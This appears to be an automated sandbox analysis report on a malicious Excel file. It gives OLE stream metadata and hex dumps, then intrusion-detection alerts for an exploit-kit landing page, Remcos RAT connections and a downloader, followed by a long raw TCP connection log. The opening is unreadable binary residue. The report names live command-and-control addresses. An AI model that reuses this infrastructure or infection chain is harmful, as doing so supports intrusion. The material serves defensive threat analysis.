ddf`aa<<;LKL423]^^srqDDF:88\[[pnmRQOTTVb_^YXX'%&125.-,TTUONN667QPP;<=xxx78!kmqxxx;<?uwx,++cbbJKMfcbJKNWTSYWUnnnWTSbdf~|zVWZ$%((%%qrt]YXTUXtuxC@?nor !$-*)&')mmmonnxxx17"xxxllotqp^\[`bc.,,a^]^`aoor:87hedNOSZWVIFEgghKHG]_aGHJ]^a#$' !pmkkln><;wxxVUU(%%310?=<tuy,))jihVYY%##YYZLJJRRSUSSxxxlhXWYJacRxxxomlQSVeeg:88aad88:#! LKL866RSU "kihmmnooo'%'gghTRP?>?xxxwts_acNNQLMOVY[;<?!~}~~klnlln:9:QPP78;WUTmmn^[[dehY[](&'lll+)+qppXYZB@@HIK**,BA@xxx/.:>>xxxoVWYyxy_`bZ\^nlk'(+noqxxxXUCTWJxxxt!!!c``;<>:87'')QNN%%&a^^>?A!XVV78:TUW533ZZ[PQS112WTTSSVxxxxxxV[zyzonoqqs~}~ono~~jikywxyxw~~kklxxxxxxu{{{}}}neutrtrprcsqnplhVk|||[Uxxxxxx{}xxxX[WxxxjU879YXXsrsFEE444ZYXIJLWTT544989ONMA@@<<>ca_WY[EDBdcfppp[[\}~656YYZ;9:>>?zxvLMPMJIZ[\ECDxxx`^I(-"xxxn[Z[DA@ddey{}336><<88:|}aac}434!fdcA>=_adxxx:=)dcM.3#xxxA?>*)(wvv&%(LLKDA@YXXnnp@ACVVV{}xxx52"lssn#xxxobPQS_]]JHGwwySSULKK((*ZY[mmoHIKWWY! rtvxxx).87(+0(xxxsqhecTQO*''ffhtssbcdMJI`adxxx]WJ?B&%xxxlYjkm[[[>?@URR245JJIAABECCA>=cef532532llnNMM>?@RPOOPR222xxxxxx{V}Do7[-X*Z%T+`-b7tG^u}pxxxxxxU`-E1~y}|{y{~{|(09J&fD|d]A=|||gK8gCtWi%@(~}#& ~$"~}!!z} {~ -+tsqrol(~!")<P#a6t?o:o;`/O$:/#~zx#" ~!!|#"" # !$$%$"%LEf\trpqmi\C}" $~|}{#x $~!~~|}" #!"~""!""#%~v|||!#$!#" $!}#%!!} ~ ~~ !wbpxxxxxxP0 """ z~$ |~vz}w|~%"`fUSxxxWWEnn[xxx}} %~|~ ! ~}#L8szkA-| IGvn<>@0.-'&'vvv//0()+ZVU((*oml013=:9014976nor%$$\\^YXXaaa/-,ZZ[))+ZYXaacIFF778CCEmoq+*+**,A?>vvvECC !YXWddeECCCEG0--MOQ?==yyz)*+URQlnp))*mkjOQS***ttsBAB{zz^`c+**z{}.--FFHllkFFGzyy79;<98568CB@ACE210wxx)((DFH/,,xxx6:#xxx<|~!uz~z}"!{o^ob~|0VT57:iff569$"!mkjbcf.+*ijl457645TUY|z{uvy?=<MOQ:88zwumorIJMstw^[Z./22//z{}/03$! wy{9;>IHItrqJLNPQSxxx/4"xxxb }{x~}#|n|!%lACFbaa332wut632('*PON^[Z>@B ddf%##(''ZZY)''y{|(&% \ZZ_abigfVXZCAA}zxGFFYYXsuxEDE:::USQecbHIL<>ATUUHJM&&'NLLxxxZUE=A([c_xxx6~"~!~~|!,#~! !w|[e=?BEDCife 743TUVCBCGHJ655557:76))+RSUlji124NPSFDD~{yOPR
                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                        Security:0
                                                                                                                        Document Code Page:1252
                                                                                                                        Number of Lines:1
                                                                                                                        Number of Paragraphs:1
                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                        Company:Grizli777
                                                                                                                        Contains Dirty Links:false
                                                                                                                        Shared Document:false
                                                                                                                        Changed Hyperlinks:false
                                                                                                                        Application Version:12.0000
                                                                                                                        General
                                                                                                                        Stream Path:\x1CompObj
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:114
                                                                                                                        Entropy:4.25248375192737
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:\x1Ole
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:20
                                                                                                                        Entropy:0.5689955935892812
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                        CLSID:
                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                        Stream Size:1301576
                                                                                                                        Entropy:4.041786466342239
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E M F . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 d6 1f 00 00 b1 1b 00 00 00 00 00 00 00 00 00 00 e7 86 00 00 08 c5 00 00 20 45 4d 46 00 00 01 00 48 dc 13 00 a3 09 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                        General
                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:6
                                                                                                                        Entropy:1.2516291673878228
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . .
                                                                                                                        Data Raw:00 00 03 00 0d 00
                                                                                                                        General
                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:244
                                                                                                                        Entropy:2.701136490257069
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                        CLSID:
                                                                                                                        File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\373\363\356\367\362\360\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                        Stream Size:90976
                                                                                                                        Entropy:3.617492259697482
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . . v
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:MBD0018D4CE/\x1Ole
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:20
                                                                                                                        Entropy:0.5689955935892812
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:MBD0018D4CE/\x3ObjInfo
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:4
                                                                                                                        Entropy:0.8112781244591328
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . .
                                                                                                                        Data Raw:00 00 03 00
                                                                                                                        General
                                                                                                                        Stream Path:MBD0018D4CE/Contents
                                                                                                                        CLSID:
                                                                                                                        File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                        Stream Size:197671
                                                                                                                        Entropy:6.989042939766534
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:Workbook
                                                                                                                        CLSID:
                                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                                        Stream Size:125121
                                                                                                                        Entropy:7.253073671715414
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-09-30T15:00:25.031872+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1191.134.96.17780192.168.2.2249173TCP
                                                                                                                        2024-09-30T15:00:25.031872+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1191.134.96.17780192.168.2.2249173TCP
                                                                                                                        2024-09-30T15:00:26.548838+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917445.90.89.986845TCP
                                                                                                                        2024-09-30T15:00:27.814190+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249176178.237.33.5080TCP
                                                                                                                        2024-09-30T15:00:28.032644+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917545.90.89.986845TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Sep 30, 2024 14:59:59.627011061 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 14:59:59.627063990 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 14:59:59.627266884 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 14:59:59.635869980 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 14:59:59.635889053 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:00.135023117 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:00.135206938 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:00.140866041 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:00.140892982 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:00.141163111 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:00.141225100 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:00.297579050 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:00.339437008 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.087476969 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.087555885 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.087573051 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.087630987 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.087652922 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.087702990 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.087707996 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.087750912 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.087805986 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.087861061 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.093800068 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.093813896 CEST44349163172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.093842983 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.093880892 CEST49163443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:01.448322058 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:01.448417902 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.448489904 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:01.448894978 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:01.448924065 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.918546915 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.918715954 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:01.963933945 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:01.963998079 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.964982986 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:02.024974108 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:02.067456961 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:02.870137930 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:02.870307922 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:02.870381117 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:02.870455027 CEST49164443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:02.870476961 CEST44349164104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.277703047 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:06.277725935 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.277786016 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:06.278443098 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:06.278455019 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.747039080 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.747204065 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:06.752137899 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:06.752150059 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.752684116 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.824223995 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:06.867429018 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:07.610397100 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:07.610656977 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:07.610718012 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:07.611278057 CEST49165443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:07.611290932 CEST44349165172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:07.771306992 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:07.771338940 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:07.771424055 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:07.771713972 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:07.771725893 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:08.236073017 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:08.236166954 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:08.241565943 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:08.241574049 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:08.241971970 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:08.242785931 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:08.283405066 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.024435043 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.024550915 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.024780989 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:09.028079987 CEST49166443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:09.028095961 CEST44349166104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.044032097 CEST49167443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:09.044085026 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.044159889 CEST49167443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:09.044337988 CEST49167443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:09.044356108 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.547672033 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.548327923 CEST49167443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:09.548360109 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:09.549052954 CEST49167443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:09.549060106 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:10.345608950 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:10.345839024 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:10.345925093 CEST49167443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:10.346025944 CEST49167443192.168.2.22104.21.78.54
                                                                                                                        Sep 30, 2024 15:00:10.346070051 CEST44349167104.21.78.54192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:10.602121115 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:10.602221966 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:10.602310896 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:10.602703094 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:10.602737904 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.073877096 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.073945999 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:11.075402975 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:11.075412989 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.076858997 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:11.076864004 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.916207075 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.916294098 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.916373014 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:11.916449070 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:11.921976089 CEST49168443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:11.922022104 CEST44349168172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.937164068 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:11.941987038 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:11.942070007 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:11.942183018 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:11.946906090 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.537955046 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538028955 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538042068 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538049936 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.538053989 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538067102 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538079977 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538089991 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.538094044 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538109064 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538120031 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538125992 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.538134098 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.538151026 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.538172007 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.538196087 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.542931080 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.542989969 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.543014050 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.543064117 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.543076038 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:12.543126106 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:12.590291023 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666683912 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666826010 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666832924 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666850090 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666870117 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666877031 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666884899 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666888952 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666903019 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666913033 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666929007 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666929007 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666939974 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666954994 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666970015 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666970015 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666985035 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.666986942 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.666999102 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667004108 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667021036 CEST804916991.134.96.177192.168.2.22
